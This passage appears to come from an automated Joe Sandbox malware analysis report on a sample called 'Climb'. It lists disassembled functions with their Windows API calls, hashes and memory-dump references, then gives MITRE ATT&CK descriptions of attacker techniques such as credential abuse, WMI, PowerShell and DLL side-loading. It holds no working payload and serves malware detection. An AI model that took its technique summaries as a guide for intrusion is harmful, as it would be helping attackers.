Opcode Fuzzy Hash: d70042b8a8e222fd526283bc1e3da2c95e243147663892ab623d2e7ef0682bd8
Instruction Fuzzy Hash: 2341B071E00219AFCB04DFA8C8859FEBBB5FF69364F118029F416A7252E7709D81CB90

Function 0012DB39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0012DB75
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0012DB7F

Strings

|, xrefs: 0012DB50

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: 1ba149233171a96fbcb516d8ce6dbf19498609d991bf10b43ff75c72077fcf13
Instruction ID: 7448f6a6bb1481f8f2ed198e296bfc6d5cfab1ba63f456d8c3a960f994823f4c
Opcode Fuzzy Hash: 1ba149233171a96fbcb516d8ce6dbf19498609d991bf10b43ff75c72077fcf13
Instruction Fuzzy Hash: FA317E71C01219ABCF05DFA0DC95EEEBFB9FF14304F104029F815A6262EB719A26CB60

Function 00144008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 001440BD
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 001440F8

Strings

static, xrefs: 00144058

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 98a8c52e79090de104b59c0a120d6a1a55afe1adf11bf8ee23ed672d6fd393c3
Instruction ID: 89ac85967edae76a0216d5587e139ca27796436307aa71421589a9bf69c0f6fe
Opcode Fuzzy Hash: 98a8c52e79090de104b59c0a120d6a1a55afe1adf11bf8ee23ed672d6fd393c3
Instruction Fuzzy Hash: 2F318B71510604ABDB249F68CC80BFB73A9FF48724F008619FAA9871A1DB71AC91CB60

Function 00144FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 001450BD
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001450D2

Strings

', xrefs: 0014502C

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: d4bb69f78c53428eafe9f479929d3fea4e122af28d239450832f98fd2473e4fd
Instruction ID: 35156c5cce4d797e432bedd2cbacd27c2ed5d012fc27a92c3183bdb8150fb60c
Opcode Fuzzy Hash: d4bb69f78c53428eafe9f479929d3fea4e122af28d239450832f98fd2473e4fd
Instruction Fuzzy Hash: 84310A78A0171A9FDB14CF69C980BDE7BB6FF49304F10416AE904AB362D771A945CF90

Function 001441AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 000B7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 000B78B1
Part of subcall function 000B7873: GetStockObject.GDI32(00000011), ref: 000B78C5
Part of subcall function 000B7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 000B78CF

GetWindowRect.USER32(00000000,?), ref: 00144216
GetSysColor.USER32(00000012), ref: 00144230

Strings

static, xrefs: 001441F3

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: c96abf7a803d6c8547e30767fe7f26be6a1110605db2bd895fcd3dbb7e1d7bbc
Instruction ID: d0f9d9ec85121358c9de452a7aa49a76851e567f200fa54836aed10caf006fda
Opcode Fuzzy Hash: c96abf7a803d6c8547e30767fe7f26be6a1110605db2bd895fcd3dbb7e1d7bbc
Instruction Fuzzy Hash: D611F676610209AFDF01DFA8DC45EEE7BF8EB09314F014524F955E3260D775E8519B60

Function 0012D763 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0012D7C2
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0012D7EB

Strings

<local>, xrefs: 0012D7AB

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: a16a7b23a6f94535348df2f55452499897dce76ceedeecd2baec3f902205042d
Instruction ID: 0cd21b269e8e906113cbc693bf07f18414d92f4010af44d858525d74023e8ade
Opcode Fuzzy Hash: a16a7b23a6f94535348df2f55452499897dce76ceedeecd2baec3f902205042d
Instruction Fuzzy Hash: AF11C6711452327AD7384B66FC45EF7BE5DEB127ACF10422AF54992180D7689850D6F0

Function 001175ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 000BB329: _wcslen.LIBCMT ref: 000BB333

CharUpperBuffW.USER32(?,?,?), ref: 0011761D
_wcslen.LIBCMT ref: 00117629

Strings

STOP, xrefs: 00117623, 00117628

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: fd99374bb6aa365274d632fb339e0bb2b5b15b6cf18aed8ff5f9c31fe84daf29
Instruction ID: b85a1bd5d8d3969d2db399cc14bc9e1b43b293f8bf7769b58a516314d6b942a5
Opcode Fuzzy Hash: fd99374bb6aa365274d632fb339e0bb2b5b15b6cf18aed8ff5f9c31fe84daf29
Instruction Fuzzy Hash: 0F01C032A18A2A8BEB28AEBDDC519FF73B5AB607907410534F425D23D5FB35D980C650

Function 0011262B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000BB329: _wcslen.LIBCMT ref: 000BB333

Part of subcall function 001145FD: GetClassNameW.USER32(?,?,000000FF), ref: 00114620

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00112699

Strings

ListBox, xrefs: 00112663
ComboBox, xrefs: 00112638

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 86d0771f85f95a200b30e4c0c27a600d0133f8cae45a61a4eb328231d59a1c51
Instruction ID: da9ed9473cf2d2e1276af35e5a2b2b0c962ec81394d4647ef30bcec1ca05de65
Opcode Fuzzy Hash: 86d0771f85f95a200b30e4c0c27a600d0133f8cae45a61a4eb328231d59a1c51
Instruction Fuzzy Hash: 4B01D475600218ABCB0CEBA4CC51CFE77B8EF56750B000629F872972D2EB71595DC651

Function 00112525 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000BB329: _wcslen.LIBCMT ref: 000BB333

Part of subcall function 001145FD: GetClassNameW.USER32(?,?,000000FF), ref: 00114620

SendMessageW.USER32(?,00000180,00000000,?), ref: 00112593

Strings

ListBox, xrefs: 0011255D
ComboBox, xrefs: 00112532

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 4b8bf39bc4b640cf898ac8be1fb3b8c768ae9d449abbd2bfa277f525ac873c40
Instruction ID: a7e2fee60d71deec28be2d08ead4b9b726d66d6751ee08e43d4f62ff1dd38d29
Opcode Fuzzy Hash: 4b8bf39bc4b640cf898ac8be1fb3b8c768ae9d449abbd2bfa277f525ac873c40
Instruction Fuzzy Hash: 5101A775740108ABCB0CE790C962DFE77A9DF56740F500039B812A3282DB649E4986B2

Function 001125A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000BB329: _wcslen.LIBCMT ref: 000BB333

Part of subcall function 001145FD: GetClassNameW.USER32(?,?,000000FF), ref: 00114620

SendMessageW.USER32(?,00000182,?,00000000), ref: 00112615

Strings

ListBox, xrefs: 001125E1
ComboBox, xrefs: 001125B6

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 15ead336cf471481d1efff18e44b6fca225172f71a51f82161293dcf066f36a3
Instruction ID: 3efba15bfd2d6a52f8f414c1550d83411cee554436c7d13c9acd428428aaf007
Opcode Fuzzy Hash: 15ead336cf471481d1efff18e44b6fca225172f71a51f82161293dcf066f36a3
Instruction Fuzzy Hash: E901D675B4010867CB09E7A0D951EFF77B89F16740F500035B802A32C2DB658E59D6B2

Function 001126B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000BB329: _wcslen.LIBCMT ref: 000BB333

Part of subcall function 001145FD: GetClassNameW.USER32(?,?,000000FF), ref: 00114620

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00112720

Strings

ListBox, xrefs: 001126ED
ComboBox, xrefs: 001126C2

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: d0f4c76ecf2eadebcbf42294ca92d90a6a76e04c2fd3235c32eaf08f2b55c03e
Instruction ID: 77ddd01d477acf9018bdb125338333fac09fb724b83ba1af8a513cf4cbe5d6e8
Opcode Fuzzy Hash: d0f4c76ecf2eadebcbf42294ca92d90a6a76e04c2fd3235c32eaf08f2b55c03e
Instruction Fuzzy Hash: 13F0A475B40218A7CB0CE7A48C51FFF77B8AF16750F400925F462A32C2EBB5594CC261

Function 00111461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0011146F

Strings

AutoIt, xrefs: 00111463
Error allocating memory., xrefs: 00111468

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 2580218c8ecfd88c6a0c309961c60171987d2390c648be7a7f395a25b3cfbf16
Instruction ID: 69e1caa47841b2446e20c61c9fa387ced207c5ed23a92dbbe1dbdfc3af9e5dd7
Opcode Fuzzy Hash: 2580218c8ecfd88c6a0c309961c60171987d2390c648be7a7f395a25b3cfbf16
Instruction Fuzzy Hash: ECE048363847143AD6143794BC07FD5B6848F05B55F15882BF74C655D34FE3249042A9

Function 000D10B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 000CFAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,000D10E2,?,?,?,000B100A), ref: 000CFAD9

IsDebuggerPresent.KERNEL32(?,?,?,000B100A), ref: 000D10E6
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,000B100A), ref: 000D10F5

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 000D10F0

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 5a6f0208f9e26254cb6d78b8ebe28ea057148c44e81b6cc09ee163d7d20b94ff
Instruction ID: 94f4e71c590e677354ee47dc49247b5d6245055a696ad8fb866564f0332f90d1
Opcode Fuzzy Hash: 5a6f0208f9e26254cb6d78b8ebe28ea057148c44e81b6cc09ee163d7d20b94ff
Instruction Fuzzy Hash: 69E06D786003118FD331AF64E915786BBE4EF08301F00892DE896C6B52EBB4D488CBA1

Function 001239D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 001239F0
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00123A05

Strings

aut, xrefs: 001239F9

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: b72154c1c97aae66700b10cf63b94ccd849044aae4157cee3a262ef17f522e37
Instruction ID: 146f02f86ac462c1df4083b0210fd144e5bf799e37fe7bd38158427a3fd00d0c
Opcode Fuzzy Hash: b72154c1c97aae66700b10cf63b94ccd849044aae4157cee3a262ef17f522e37
Instruction Fuzzy Hash: E7D05E7650032867DE20A764AC0EFCB7B7CDB45710F0002A1BA55920E1DAF0DA85CB90

Function 00142DBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00142DC8
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00142DDB

Part of subcall function 0011F292: Sleep.KERNEL32 ref: 0011F30A

Strings

Shell_TrayWnd, xrefs: 00142DC1

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: fd8d863636a2ef7c063f42e38654672f4a29d7c9dcbf964ac323638883f8dcc4
Instruction ID: 2be801b06de90f9b1f577f01327ee413926348f5603bb5bc98b8d80b0a1b8fc5
Opcode Fuzzy Hash: fd8d863636a2ef7c063f42e38654672f4a29d7c9dcbf964ac323638883f8dcc4
Instruction Fuzzy Hash: 80D02239384310B7EA28B330BC0FFD23B20AF11B10F1088347309AA0E0CAE0A880C640

Function 00142DF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00142E08
PostMessageW.USER32(00000000), ref: 00142E0F

Part of subcall function 0011F292: Sleep.KERNEL32 ref: 0011F30A

Strings

Shell_TrayWnd, xrefs: 00142E01

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: e6d3040cac19c74f7679077c4bc41906cc2b12f627374027ee0b4d85d752523f
Instruction ID: 9a5a48fca0449dd956cd34cd1a9f56cb0eee8d5d17701ab67a8e5d52f3ae4c18
Opcode Fuzzy Hash: e6d3040cac19c74f7679077c4bc41906cc2b12f627374027ee0b4d85d752523f
Instruction Fuzzy Hash: 7BD022393C13107BFA28B330BC0FFC23B20AB12B10F1088347309AA0E0CAE0A880C644

Function 000EC17D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 000EC213
GetLastError.KERNEL32 ref: 000EC221
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 000EC27C

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 4dfaf3a766cf5ed8bf63fb4dd436c43d46a7aa9967ffa46603e8c2d595203467
Instruction ID: 420e480d5fec999037ae1aeddac2f87d22838ba1e982817b7f1b66e3aa9e1f35
Opcode Fuzzy Hash: 4dfaf3a766cf5ed8bf63fb4dd436c43d46a7aa9967ffa46603e8c2d595203467
Instruction Fuzzy Hash: 6B41D731604286EFEB618FE6C844EBE7BE5AF51710F24416DF956B72A1DB328D02C760

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
